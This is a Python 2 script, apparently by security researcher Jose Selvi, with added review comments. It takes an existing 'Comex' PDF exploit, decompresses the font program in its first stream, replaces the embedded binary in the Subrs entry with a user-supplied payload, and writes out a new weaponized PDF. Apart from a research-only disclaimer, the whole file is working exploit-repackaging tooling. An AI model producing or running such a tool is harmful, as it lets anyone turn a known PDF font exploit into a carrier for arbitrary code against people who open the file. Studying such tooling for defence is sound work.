#!/usr/bin/python
import zlib, sys, re, struct
# Disclaimer
# NOTE: Python 2 script (print statements; `str` is used for both text and raw
# zlib/binary data, so it does not run unchanged under Python 3).
# Purpose: take an existing Comex PDF exploit file (sys.argv[1]), replace the
# zlib-compressed binary embedded in the font program inside its first stream
# with a new file (sys.argv[2]), and write the rebuilt PDF to sys.argv[3].
print 'This information is for research and academic purposes only! This info is not to be abused! I am not responsible for any damage that you may create!'
print 'Jose Selvi - [email protected]'
# Checking Arguments
# Exactly three positional arguments are required. `exit()` is the site
# builtin (no argument -> exit status 0), not sys.exit().
if len(sys.argv) != 4:
    print 'Usage: ' + sys.argv[0] + ' <Comex_PDF_Exploit.pdf> <New_Payload.bin> <Output.pdf>'
    exit()
print 'Input PDF: ' + sys.argv[1]
print 'Inpunt Binary: ' + sys.argv[2]
print 'Output PDF: ' + sys.argv[3]
# Read PDF Exploit
# Whole file slurped into memory as a byte string. The handle is never closed
# explicitly; CPython releases it when the temporary object is collected.
pdf = open(sys.argv[1], 'rb').read()
# Search encoded stream
# Only the FIRST "\nstream\n" ... "\nendstream\n" pair is located; the script
# assumes that stream is the compressed font program. If either marker is
# absent, re.search returns None and the following .end()/.start() raises
# AttributeError (no explicit error handling anywhere in the script).
m1 = re.search('\nstream\n', pdf)
stream_begin = m1.end()
m2 = re.search('\nendstream\n', pdf[stream_begin:])
stream_end = m2.start() + stream_begin
# Split PDF content
# The slices deliberately drop the "\n" on either side of the stream body;
# both newlines are re-inserted when the PDF is reassembled at the end.
pdf_before_stream = pdf[:stream_begin-1]
pdf_encoded_stream = pdf[stream_begin:stream_end]
pdf_after_stream = pdf[stream_end+1:]
# Decode Stream
# Assumes a single plain FlateDecode stream (no predictor or other filter);
# zlib.error is not caught.
pfb = zlib.decompress( pdf_encoded_stream )
# Search dup 0 line
# Inside the decompressed font program the payload lives in the first Subrs
# entry: everything between the "/Subrs N array" line and the "dup 1 " line.
m1 = re.search('\n/Subrs [0-9]+ array\n', pfb)
dup_begin = m1.end()
m2 = re.search('\ndup 1 ', pfb)
dup_end = m2.start()
# Split PFB Content
# Same newline-trimming convention as the PDF split above.
pfb_before_dup0 = pfb[:dup_begin-1]
pfb_dup0 = pfb[dup_begin:dup_end]
pfb_after_dup0 = pfb[dup_end+1:]
# Get Length and encoded file
# Entry layout is "dup 0 <len> x <data> put": file_begin skips the textual
# prefix, the -4 strips the trailing " put" (4 bytes).
m1 = re.search('dup 0 [0-9]+ x ', pfb_dup0)
file_begin = len(m1.group(0))
file_end = len(pfb_dup0)-4
# Save original binary
# The old compressed payload; only its length is used afterwards, as the
# padding target for the new one.
z_oldbin = pfb_dup0[file_begin:file_end]
z_oldbin_len = len( z_oldbin )
# Read new payload
# Compressed at level 9 and right-padded with NUL bytes up to the old slot
# length. NOTE(review): there is no size check -- if the new compressed payload
# is LONGER than the old one, '\x00' * (negative) is '' and the entry simply
# grows, so the rebuilt stream no longer has the original's size.
newbin = open(sys.argv[2], 'rb').read()
newbin_encoded = zlib.compress( newbin, 9 )
newbin_len = len( newbin_encoded )
newbin_encoded = newbin_encoded + '\x00'*(z_oldbin_len-newbin_len)
newbin_len = len( newbin_encoded )
# Create Dup 0 string
# The length field written here is the PADDED length, not the compressed size.
pfb_dup0 = 'dup 0 ' + str(newbin_len) + ' x ' + newbin_encoded + ' put'
# Create New PFB
pfb = pfb_before_dup0 + '\n' + pfb_dup0 + '\n' + pfb_after_dup0
# Compress PFB and Create New PDF
# pdf_before_stream (which, in a well-formed PDF, contains the stream's
# dictionary) is reused verbatim, so a /Length entry in it, if present, is not
# updated for the new compressed size.
pdf_encoded_stream = zlib.compress( pfb, 9 )
pdf = pdf_before_stream + '\n' + pdf_encoded_stream + '\n' + pdf_after_stream
# NOTE(review): written without an explicit close()/flush(); CPython flushes
# when the temporary file object is garbage-collected.
open(sys.argv[3], 'wb').write(pdf)